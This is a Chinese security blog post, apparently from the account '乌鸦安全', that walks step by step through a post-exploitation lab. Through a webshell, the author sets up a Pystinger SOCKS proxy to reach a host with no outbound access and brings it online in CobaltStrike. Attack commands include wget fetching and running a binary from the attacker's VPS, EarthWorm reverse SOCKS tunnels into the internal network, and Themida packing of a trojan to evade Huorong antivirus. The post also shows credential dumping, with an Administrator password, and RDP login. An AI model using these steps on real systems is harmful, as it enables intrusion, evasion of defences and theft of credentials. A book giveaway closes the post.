乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
乌鸦安全拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经授权,不得用于其他。
01 使用场景
毒刺(Pystinger)通过webshell搭建内网socks4代理,可用于上线CobaltStrike,此方法适用于目标主机不出网但存在web应用可被互联网访问的情况。
02 拓扑结构
03 使用方法
下载地址:
https://github.com/FunnyWolf/pystinger
访问http://靶机VPS:7777/proxy.php
此时页面出现UTF-8
即为成功。
stinger_server
上传到目标服务器并开启服务端等待客户端连接可能是因为文件太大,压缩之后还是没法传
这里使用命令行远程Wget
来下载到目标服务器上。
在自己的VPS上搭建一个server python3 -m http.server 1234
在目标服务器上使用wget来下载
wget http://自己的VPS:1234/stinger_server
然后执行
chmod 700 stinger_server
./stinger_server 0.0.0.0
在自己的VPS服务器上执行
./stinger_client -w http://自己的VPS:7777/proxy.php -l 127.0.0.1 -p 60000
此时目标机的60020
端口已经映射到了VPS的60020
端口了。
在VPS上启动CS的服务端,然后设置监听,其中HTTP Hosts
为目标机的ip地址,端口默认60020
。
目标机网络:192.168.99.110
10.0.1.135
这里是目标机的内网IP地址
生成木马
保存等待上传到内网机
04 代理到内网机
先在目标机执行ew
./ew_for_linux64 -s rssocks -d 自己的VPS -e 4399
然后在VPS上执行ew
./ew_for_linux64 -s rcsocks -l 1080 -e 4399
设置代理之后即可访问内网
拿下webshell
权限之后,使用蚁剑连接,准备传exe
配置蚁剑代理,重启
05 免杀火绒登陆3389
然后上传exe上去,但是由于内网机有火绒,所以在这里需要免杀处理。
使用Themida
加壳免杀。
上传至内网机。
然后运行程序,上线成功
抓密码:
用户名:Administrator
密码:!QW@34567
检测3389是否开启
端口是3389,设置代理直接登陆。
使用Proxifiler
登陆成功。
送书福利
为了感谢大家长期以来的支持,乌鸦安全开始了送书活动,
这次挑选了一本《Java核心技术及面试指南》送给1位粉丝。
具体规则如下:
(1)关注本公众号:乌鸦安全
(2)在本公众号里回复关键字:抽奖 参与抽奖
(3)将本文转发至朋友圈,抽奖前不可删除!抽奖前不可取消公众号关注!
(4)开奖结束后,请中奖的小伙伴及时联系抽奖页面联系方式(超过48小时未联系视为自动放弃)
以上条件缺一不可哦!